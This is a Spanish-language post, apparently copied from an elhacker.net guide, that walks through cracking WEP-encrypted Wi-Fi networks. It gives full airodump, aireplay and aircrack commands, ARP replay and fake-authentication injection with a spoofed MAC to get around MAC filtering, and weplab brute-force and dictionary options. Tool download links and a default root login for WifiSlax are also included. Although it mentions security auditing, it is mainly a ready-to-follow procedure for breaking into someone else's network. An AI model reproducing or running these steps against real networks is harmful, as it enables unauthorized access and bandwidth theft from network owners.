Manual para usar el airsnort

http://www.mediafire.com/?byiwvszqysc

Manual en formato .doc con bastante informacion para usar el airsnort tanto en windows como en linux.

Hack wifi en windows: airrodump+aircrack y uso del airsnort

Tomado de: http://hwagm.elhacker.net/windows.htm

Realmente no solo es un programa, sino un conjunto completo, muy fáciles de utilizar.
Estas herramientas se basan en poder poner la tarjeta inalambrica en modo monitor, lo cual en windows no siempre es facil (debido a los drivers), pero en linux es mas sencillo.

El modo monitor es un modo de funcionamiento de la tarjeta inalámbrica en el cual es capaz de recoger todos los paquetes que aparecen en su radio de alcance pero sin inyectar ninguno a la red. El funcionamiento de una tarjeta WIFI trabajando en modo monitor es muy similar a un sniffer para redes TCP/IP convencionales.

Es una de las mejores herramientas para analizar el nivel de seguridad de nuestras instalaciones wireless ya que suele ser el arma mas utilizada por la mayoría de personas que quieren reducir nuestro ancho de banda.

1.- Airodump: Programa que permite capturar paquetes de datos.

2.- Aircrack: Permite averiguar y recuperar claves con cifrado WEP.

3.- Wzcook: Permite averiguar y recuperar claves con cifrado WEP almacenada en una estación cliente en windows.

4.- Airdecap.

Es necesario colocar en el mismo directorio los ficheros: <<Peek.dll, Peek5.sys y msvcr70.dll>>.

También puede ser necesario el fichero cygwin1.dll

Para bajar la suite completa hagan click en este link:

Comprimido con herramientas y manuales:
http://www.mediafire.com/?9wykuw1idhp

Manual de tarjetas de red inalambricas:
http://www.mediafire.com/?ew3ttdjmjz1

AirSnort solo funciona en dos versiones de este sistema operativo (Windows 2000 y Windows XP) según se indica en la página del creador de AirSnort y no esta previsto hacer compatible el programa con ninguna otra versión anterior este sistema operativo de Microsoft.

Al igual que en el caso de Linux podemos o bien ejecutar el programa ya compilado o bien compilar el programa nosotros mismos.

Suponemos que ya hemos descargado los drivers de AiroPeek compatibles con nuestra tarjeta y que los hemos instalado en nuestro sistema. En otro caso no podremos utilizar el programa.

El proceso de instalación para utilizar el fichero compilado o bien para compilar nosotros mismo el código es muy similar. Los siguientes pasos son comunes.

1º Descargar AirSnort de la pagina oficial

http://easynews.dl.sourceforge.net/sourceforge/airsnort/airsnort-0.2.7e.tar.gz

2º Una vez descargado deberemos descomprimir el fichero para obtener el programa y sus fuentes (Para esto podemos utilizar cualquier descompresor compatible).

3º Descargamos e instalamos las librerías necesarias para el funcionamiento del programa.

GTK + 2.4.14 http://www.gimp.org/~tml/gimp/win32/gtk+-2.4.14.zip

Glib 2.4.7 http://www.gimp.org/~tml/gimp/win32/glib-2.4.7.zip

Pango 1.4.1 http://www.gimp.org/~tml/gimp/win32/pango-1.4.1.zip

ATK 1.8.0 http://www.gimp.org/~tml/gimp/win32/atk-1.8.0.zip

4º Copiamos los archivos Peek5.sys y peek.dll de la carpeta donde tengamos instalados los drivers de Airopeek dentro de la carpeta bin que encontraemos en la carpeta en la que tengamos instalado AirSnort.

5º Descargar iconv.dll dentro de la carpeta bin de AirSnort.
http://www.dlldump.com/cgi-bin/downloadcounts.cgi?rt=count&path=dllfiles/I/iconv.dll

6º Descargar intl.dll dentro de la carpeta bin de AirSnort.
http://www.dlldump.com/cgi-bin/downloadcounts.cgi?rt=count&path=dllfiles/I/intl.dll

7º Ejecutamos el archivo AirSnort.exe que se encuentra en la carpeta en la que hemos descomprimido el programa (dentro de la carpeta bin).

La única diferencia entre los dos procesos de instalación es la siguiente:

6-Bº Compilamos el código fuente descargado con cualquier compilador de C++ para windows.

Auditoria wirelles, WEP y WPA

Se debe descargar la ultima versión de troppix (la version 1.2 ). Estas tecnicas se basan en poner la tarjeta inalambrica en modo monitor, ahora esto en windows es casi imposible de hacer debido a que no se dispone de los driver apropiados, pero en linux es bastante facil, de hecho troppix es una pequeña distribución linux, que esta especialmente diseñada para la auditoria wirelles, de hecho se debe usar solo para chequear la seguridad de las redes inalambricas.

Arrancamos la maquina desde CD con troppix, y luego en modo consola ponemos ( de hecho es lo primero que aparece):

1.- Uso del airodump y el aircrack:

rmmod ipw2200
echo 100 > /sys/class/firmware/timeout
modprobe ipw2200

Luego ponemos:

iwconfig
esto nos da el nombre de la tarjeta (eth0, ath0, etc).

Nuestra tarjeta es la única que al lado no pone “No wireless extensions”

Código:

airmon.sh start ath0

y ahora entramos en el airodump.

Código:

airodump ath0 pruebas 0 1

donde ath0 es la tarjeta, pruebas es el archivo donde se guardan las capturas ,0 es el canal( al escribir 0 indicamos que busque en todos) y 1 indica que sólo se guarden los IVs, para ahorrar espacio en disco o en memoria.

Miramos cual es el nombre de la red que queremos buscar la WEP y apuntamos el Channel y el ESSID( nombre de la red), en este manual pongamos que es el 6 y el ESSID “Uxio”.

Entonces pulsamos Control+Z y escribimos

Código:

iwconfig ath0 mode monitor channel 6 essid Uxio

Código:

airmon.sh start ath0 6

Código:

airodump ath0 pruebas 6 1

Bien, entonces así ya estaría. esperamos a que el DATA aumente y cuando llegue a más de 250.000 abrimos otra ventana de comandos (hacemos click en el monitor de abajo) y escribimos

Código:

aircrack pruebas*.ivs

Con un poco de suerte debería aparecer la clave aunque a veces se pueden llegar a necesitar hasta 4 millones de IVs (DATA)

2.- Acelerar el proceso cuando hay alguien conectado.

Los DATA suben muy lentos. Para que suban más rápido debemos usar aireplay. Miramos los datos que aparecen en la lista de abajo y cubrimos aquí los datos. Miramos que el BSSID coincida con el de nuestra red. Si hay varios, sirve cualquiera. Para escribir esto abrimos otra ventana.

Código:

aireplay -3 ath0 -b BSSID -h STATION

3.- Hacer que haya proceso o acelerarlo cuando no hay “Station” (Cliente), es decir, nadie conectado.

A veces ni siquiera van a subir los DATA ni vamos a tener nada en la lista de abajo que tenga que ver con nuestra red. Esto se soluciona de la siguiente manera. Primero abrimos otra ventana y luego ponemos:

Código:

aireplay -1 30 ath0 -e ESSID -a BSSID -h 00:11:22:33:44:55

Si al final de este comando nos pone association successful lo hemos hecho bien, pero esa ventana no la cerramos porque va a seguir enviando datos cada 30 segundos. Si nos da algún problema escribimos:

Código:

iwconfig ath0 rate 1M essid ESSID

Los problemas pueden ser debidos a:

• El AP está muy lejos
• El AP está protegido contra este ataque (no hay solución)
• Los drivers no están parcheados para la reinyección, pero si estan usando Troppix no se preocupen por esto porque ya vienen instalados por defecto
• Filtrado MAC. Nos pondrá algo así “AP rejects MAC”. Para solucionarlo tendremos que coneguir la MAC de un cliente, así que mejor dejamos que se conecte y hacemos el paso 5 directamente.

y luego lo de antes.

Código:

aireplay -1 30 ath0 -e ESSID -a BSSID -h 00:11:22:33:44:55

Bien, después de association succesful abrimos una nueva ventana de comandos y escribimos

Código:

aireplay -3 ath0 -b BSSID -h 00:11:22:33:44:55 -x 300

Si sale bien veremos que cuando lleve cierto número de READ empezarán a aumentar ARP y SENT. Además en el airodump veremos que los DATA empiezan a subir.

Después de todo esto tenemos que ejecutar el aircrack como ya dije antes para averiguar la clave.

Como curiosidad (y salvación para algunos), las redes que son del estilo “PACO 27″, sin barra (_), en aireplay quedarían así

Código:

-e PACO\ 27.

Una vez que tengamos unos 5000 en DATA (en caso de encriptacion wep) podemos intentar un ataque por fuerza bruta a ver si tenemos suerte, para ello usamos weplab:

Usage: weplab [OPTIONS]… FILE
Options:
–debug prints debug information
-v, –verbose print more information
-y, –dictionary uses words (from stdin) as wep keys
-k, –key [64|128] specifies 128 or 64 bits (default) key
-b, –bruteforce brute forces wep keys
-c, –capture capture encrypted data packets
-i, –interface for capturing packets with –capture
-r, –heuristics file uses weak keys and intelligent bruteforce
-a, –analysis analyze file and get lite statistics
-m, –multiprocess Assume of processes. Number must be between 1-64. Default 1.
–caplen maximun length of captured packets with –capture (default 80)
–fcs assume all captured frames has the FCS field
–keyid just analyze specific id Wep packets. Only for 64 bits keys. (default 0)
–prismheader assume all captured frames has the Prism header
–allow_dups do not control packets with duplicated IVs
–perc uses this minimun percentage of succeed when using FMS cracking
–ascii just use bytes 0×00-0x3F for bruteforce wep key with –bruteforce
–stability selects level of stability. Another way to specify which attacks, depending on their stability
level, will be launched
–debugkey Gives the real wep key to weplab to gather information about a crack. must be in
the form of AA:BB:CC:DD… and may be incomplete.
–attacks allows you to select which attacks will be used for heuristic mode.
–bssid does only process those packets that belongs to specified BSSID
-h, –help display this help and exit
-V, –version output version information and exit

Por ejemplo digamos que quieres hacer por fuerza bruta. Pues:
weplab -v -b archivo.cap

Si lo que quieres lo mismo pero solo probando caracteres ASCII:
weplab -v -b -ascii archivo.cap

Si quieres utilizar un diccionario:
weplab -v -y

El weplab se consigue en:

http://weplab.sourceforge.net/

Una vez que tengamos la clave estara en hexadecimal, podemos llevarla a ASCII que es como la necesitaremos con la ayuda de esto:

http://hwagm.elhacker.net/php/sneak.php

Esta es la tabla si lo quieren hacer manual:

ASCII	Hex	Símbolo
0	0	NUL
1	1	SOH
2	2	STX
3	3	ETX
4	4	EOT
5	5	ENQ
6	6	ACK
7	7	BEL
8	8	BS
9	9	TAB
10	A	LF
11	B	VT
12	C	FF
13	D	CR
14	E	SO
15	F	SI
ASCII	Hex	Símbolo
16	10	DLE
17	11	DC1
18	12	DC2
19	13	DC3
20	14	DC4
21	15	NAK
22	16	SYN
23	17	ETB
24	18	CAN
25	19	EM
26	1A	SUB
27	1B	ESC
28	1C	FS
29	1D	GS
30	1E	RS
31	1F	US
ASCII	Hex	Símbolo
32	20	(espacio)
33	21	!
34	22	“
35	23	#
36	24	$
37	25	%
38	26	&
39	27	‘
40	28	(
41	29	)
42	2A	*
43	2B	+
44	2C	,
45	2D	-
46	2E	.
47	2F	/
ASCII	Hex	Símbolo
48	30	0
49	31	1
50	32	2
51	33	3
52	34	4
53	35	5
54	36	6
55	37	7
56	38	8
57	39	9
58	3A	:
59	3B	;
60	3C	<
61	3D	=
62	3E	>
63	3F	?
ASCII	Hex	Símbolo
64	40	@
65	41	A
66	42	B
67	43	C
68	44	D
69	45	E
70	46	F
71	47	G
72	48	H
73	49	I
74	4A	J
75	4B	K
76	4C	L
77	4D	M
78	4E	N
79	4F	O
ASCII	Hex	Símbolo
80	50	P
81	51	Q
82	52	R
83	53	S
84	54	T
85	55	U
86	56	V
87	57	W
88	58	X
89	59	Y
90	5A	Z
91	5B	[
92	5C	\
93	5D	]
94	5E	^
95	5F	_
ASCII	Hex	Símbolo
96	60	`
97	61	a
98	62	b
99	63	c
100	64	d
101	65	e
102	66	f
103	67	g
104	68	h
105	69	i
106	6A	j
107	6B	k
108	6C	l
109	6D	m
110	6E	n
111	6F	o
ASCII	Hex	Símbolo
112	70	p
113	71	q
114	72	r
115	73	s
116	74	t
117	75	u
118	76	v
119	77	w
120	78	x
121	79	y
122	7A	z
123	7B	{
124	7C	|
125	7D	}
126	7E	~
127	7F	

WifiSlax

WifiSlax es una distribución Linux en formato Live-CD enfocada a la auditoria inalámbrica. Esta basada en Slax. Aunque los autores de WifiSlax debido al trabajo realizado por los creadores de BackTrack trabajaron directamente sobre dicha distribución. Lo que mas la caracteriza y no lleva integrada ninguna otra distribución son los famosos drivers de la ipw2200, los rt73 de las nuevas tarjetas USB con chipset ralink, y las nuevas PCI con el chipset rt61.

Lo primero que debemos hacer es descargar el Live-CD de la página Web de WifiSlax donde podemos encontrar la distribución en descarga directa http://www.wifislax.com/principal/descargas.html

Esta es una imagen ISO que debemos grabar en un CD usando para ello cualquier programa de volcado de iso en CD tales como Nero, alcohol, etc, use el de su preferencia.

Una vez hemos realizado el proceso de grabación debemos iniciar el PC desde el disco previamente grabado.

Luego se reinicia la maquina desde el CD, con lo cual ya tenemos un ambiente Linux con un tipico entorno grafico KDE.

Por cierto esta es la clave de root:
Wifislax login:root
Password:toor

Se puede instalar en disco duro, para ello se debe crear la partición correspondiente con qparted que ya viene en el CD, se crean las particiones y listo.

Drivers
WifiSlax incluye soporte para los chipset de las tarjetas wireless que mas usamos y mas no interesan:
•Prism54
•Madwifi-ng
•Wlan-ng
•HostAP
•Ralink rt2570
•Ralink rt2500
•Ralink rt73
•Ralink rt61
•Zydas ZD1201 – ZD1211rw – ZD1211b (sin interrupciones en las capturas)
•Intel pro wireless ipw2100
•Intel pro wireless ipw2200
•Intel pro wireless ipw3945
•Realtek rtl8180
•Realtek rtl8185
•Realtek rtl8187
•Broadcom (incluida la inyección)
•Texas Instruments

Usenlo se los recomiendo ampliamente.